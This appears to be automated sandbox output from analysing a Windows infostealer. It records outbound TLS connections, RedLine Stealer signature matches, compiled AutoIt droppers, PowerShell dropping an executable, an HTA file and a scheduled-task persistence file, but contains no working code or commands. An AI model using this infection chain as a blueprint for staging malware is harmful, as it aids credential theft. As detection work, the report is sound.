Source: unknown	Network traffic detected: HTTP traffic on port 50096 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50133 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50083
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown	Network traffic detected: HTTP traffic on port 50100 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50128
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 49969 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50120
Source: unknown	Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50086
Source: unknown	Network traffic detected: HTTP traffic on port 50093 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50054 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50089
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50122
Source: unknown	Network traffic detected: HTTP traffic on port 50150 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50123
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50126
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50125
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50090
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50091
Source: unknown	Network traffic detected: HTTP traffic on port 50136 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50093
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50096
Source: unknown	Network traffic detected: HTTP traffic on port 50153 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50095
Source: unknown	Network traffic detected: HTTP traffic on port 50105 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50138
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50149 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50098
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50131
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50097
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50133
Source: unknown	Network traffic detected: HTTP traffic on port 50090 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50134
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50136
Source: unknown	Network traffic detected: HTTP traffic on port 50106 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50140
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49933
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50149
Source: unknown	Network traffic detected: HTTP traffic on port 50123 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 50117 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50141
Source: unknown	Network traffic detected: HTTP traffic on port 50095 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50146
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50148
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50147
Source: unknown	Network traffic detected: HTTP traffic on port 50098 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50151
Source: unknown	Network traffic detected: HTTP traffic on port 50138 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50150
Source: unknown	Network traffic detected: HTTP traffic on port 50103 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50141 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49922
Source: unknown	Network traffic detected: HTTP traffic on port 50086 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown	Network traffic detected: HTTP traffic on port 50118 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50153
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50036
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50110 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49982 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50140 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50089 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50083 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49910
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 50146 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50115 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50097 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50109 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50126 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748

Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49874 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49882 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49894 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49910 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49922 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49933 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49950 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:49951 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:49958 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49969 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:49970 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:49982 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:49999 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:50020 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:50036 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:50054 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:50083 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:50086 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:50089 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:50090 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:50093 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.202.5.153:443 -> 192.168.2.4:50091 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:50100 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50105 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:50109 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:50115 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50117 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:50123 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50125 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50126 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:50133 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:50138 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:50140 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:50141 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:50146 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:50147 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:50148 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:50149 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:50150 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:50151 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.4:50153 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 0000000E.00000003.2445420622.0000000004D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: 275588fe9c.exe PID: 7880, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown

Binary is likely a compiled AutoIt script file

Source: f8fdf848d8.exe, 00000013.00000000.2580741835.0000000000E52000.00000002.00000001.01000000.00000016.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_915a848b-5
Source: f8fdf848d8.exe, 00000013.00000000.2580741835.0000000000E52000.00000002.00000001.01000000.00000016.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_7950aff6-f
Source: ec93a94e48.exe, 00000016.00000000.2627404382.00000000006C2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_7f9d3ec9-8
Source: ec93a94e48.exe, 00000016.00000000.2627404382.00000000006C2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_9b734313-a
Source: f8fdf848d8.exe, 00000031.00000000.2809098327.0000000000E52000.00000002.00000001.01000000.00000016.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_b3630dca-3
Source: f8fdf848d8.exe, 00000031.00000000.2809098327.0000000000E52000.00000002.00000001.01000000.00000016.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_9a98f958-0

Creates HTA files

Source: C:\Users\user\AppData\Local\Temp\1062354001\ec93a94e48.exe

File created: C:\Users\user\AppData\Local\Temp\9OAIPrhRB.hta

PE file contains section with special chars

Source: random.exe	Static PE information: section name:
Source: random.exe	Static PE information: section name: .idata
Source: random.exe	Static PE information: section name:
Source: AGDDD2MYZL6KQO94XW.exe.0.dr	Static PE information: section name:
Source: AGDDD2MYZL6KQO94XW.exe.0.dr	Static PE information: section name: .idata
Source: AGDDD2MYZL6KQO94XW.exe.0.dr	Static PE information: section name:
Source: HYCURX00F7L1ZQ3FYN.exe.0.dr	Static PE information: section name:
Source: HYCURX00F7L1ZQ3FYN.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.3.dr	Static PE information: section name:
Source: skotes.exe.3.dr	Static PE information: section name: .idata
Source: random[2].exe.11.dr	Static PE information: section name:
Source: random[2].exe.11.dr	Static PE information: section name: .idata
Source: random[2].exe.11.dr	Static PE information: section name:
Source: fee976e9bb.exe.11.dr	Static PE information: section name:
Source: fee976e9bb.exe.11.dr	Static PE information: section name: .idata
Source: fee976e9bb.exe.11.dr	Static PE information: section name:
Source: random[3].exe.11.dr	Static PE information: section name:
Source: random[3].exe.11.dr	Static PE information: section name: .idata
Source: random[3].exe.11.dr	Static PE information: section name:
Source: f64eac2185.exe.11.dr	Static PE information: section name:
Source: f64eac2185.exe.11.dr	Static PE information: section name: .idata
Source: f64eac2185.exe.11.dr	Static PE information: section name:
Source: random[1].exe.11.dr	Static PE information: section name:
Source: random[1].exe.11.dr	Static PE information: section name: .idata
Source: 5f198671b1.exe.11.dr	Static PE information: section name:
Source: 5f198671b1.exe.11.dr	Static PE information: section name: .idata
Source: random[1].exe0.11.dr	Static PE information: section name:
Source: random[1].exe0.11.dr	Static PE information: section name: .idata
Source: random[1].exe0.11.dr	Static PE information: section name:
Source: 1cfdc82c16.exe.11.dr	Static PE information: section name:
Source: 1cfdc82c16.exe.11.dr	Static PE information: section name: .idata
Source: 1cfdc82c16.exe.11.dr	Static PE information: section name:
Source: random[1].exe1.11.dr	Static PE information: section name:
Source: random[1].exe1.11.dr	Static PE information: section name: .idata
Source: random[1].exe1.11.dr	Static PE information: section name:
Source: 275588fe9c.exe.11.dr	Static PE information: section name:
Source: 275588fe9c.exe.11.dr	Static PE information: section name: .idata
Source: 275588fe9c.exe.11.dr	Static PE information: section name:
Source: random[1].exe2.11.dr	Static PE information: section name:
Source: random[1].exe2.11.dr	Static PE information: section name: .idata
Source: random[1].exe2.11.dr	Static PE information: section name:
Source: 0436fcd702.exe.11.dr	Static PE information: section name:
Source: 0436fcd702.exe.11.dr	Static PE information: section name: .idata
Source: 0436fcd702.exe.11.dr	Static PE information: section name:
Source: random[2].exe0.11.dr	Static PE information: section name:
Source: random[2].exe0.11.dr	Static PE information: section name: .idata
Source: random[2].exe0.11.dr	Static PE information: section name:
Source: 48b7eec64e.exe.11.dr	Static PE information: section name:
Source: 48b7eec64e.exe.11.dr	Static PE information: section name: .idata
Source: 48b7eec64e.exe.11.dr	Static PE information: section name:
Source: random[3].exe0.11.dr	Static PE information: section name:
Source: random[3].exe0.11.dr	Static PE information: section name: .idata
Source: random[3].exe0.11.dr	Static PE information: section name:
Source: 071b4af2c1.exe.11.dr	Static PE information: section name:
Source: 071b4af2c1.exe.11.dr	Static PE information: section name: .idata
Source: 071b4af2c1.exe.11.dr	Static PE information: section name:
Source: tmpE345.tmp.14.dr	Static PE information: section name:
Source: tmpE345.tmp.14.dr	Static PE information: section name: .idata
Source: tmpE345.tmp.14.dr	Static PE information: section name:
Source: NEGM0426B51QOF76X3GO8.exe.16.dr	Static PE information: section name:
Source: NEGM0426B51QOF76X3GO8.exe.16.dr	Static PE information: section name: .idata
Source: NEGM0426B51QOF76X3GO8.exe.16.dr	Static PE information: section name:
Source: N9RHN6UAFCLUOOV6DH7.exe.16.dr	Static PE information: section name:
Source: N9RHN6UAFCLUOOV6DH7.exe.16.dr	Static PE information: section name: .idata
Source: TempBUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE.30.dr	Static PE information: section name:
Source: TempBUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE.30.dr	Static PE information: section name: .idata

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\TempBUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe

Code function: 2_2_6C5962C0 PR_dtoa,PR_GetCurrentThread,strlen,NtFlushVirtualMemory,PR_GetCurrentThread,memcpy,memcpy,

2_2_6C5962C0

Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C41AC60	2_2_6C41AC60
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4D6C00	2_2_6C4D6C00
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4EAC30	2_2_6C4EAC30
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C40ECC0	2_2_6C40ECC0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C46ECD0	2_2_6C46ECD0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C53AD50	2_2_6C53AD50
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4DED70	2_2_6C4DED70
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C598D20	2_2_6C598D20
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C59CDC0	2_2_6C59CDC0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4A6D90	2_2_6C4A6D90
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C414DB0	2_2_6C414DB0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4AEE70	2_2_6C4AEE70
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4F0E20	2_2_6C4F0E20
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C41AEC0	2_2_6C41AEC0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4B0EC0	2_2_6C4B0EC0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C496E90	2_2_6C496E90
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C47EF40	2_2_6C47EF40
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4D2F70	2_2_6C4D2F70
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C416F10	2_2_6C416F10
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C550F20	2_2_6C550F20
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C410FE0	2_2_6C410FE0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4EEFF0	2_2_6C4EEFF0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C558FB0	2_2_6C558FB0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C41EFB0	2_2_6C41EFB0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4E4840	2_2_6C4E4840
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C460820	2_2_6C460820
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C49A820	2_2_6C49A820
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C5168E0	2_2_6C5168E0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C448960	2_2_6C448960
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C466900	2_2_6C466900
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C52C9E0	2_2_6C52C9E0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4449F0	2_2_6C4449F0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4A09A0	2_2_6C4A09A0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4CA9A0	2_2_6C4CA9A0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4D09B0	2_2_6C4D09B0
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C48CA70	2_2_6C48CA70
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4BEA00	2_2_6C4BEA00
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Code function: 2_2_6C4C8A30	2_2_6C4C8A30
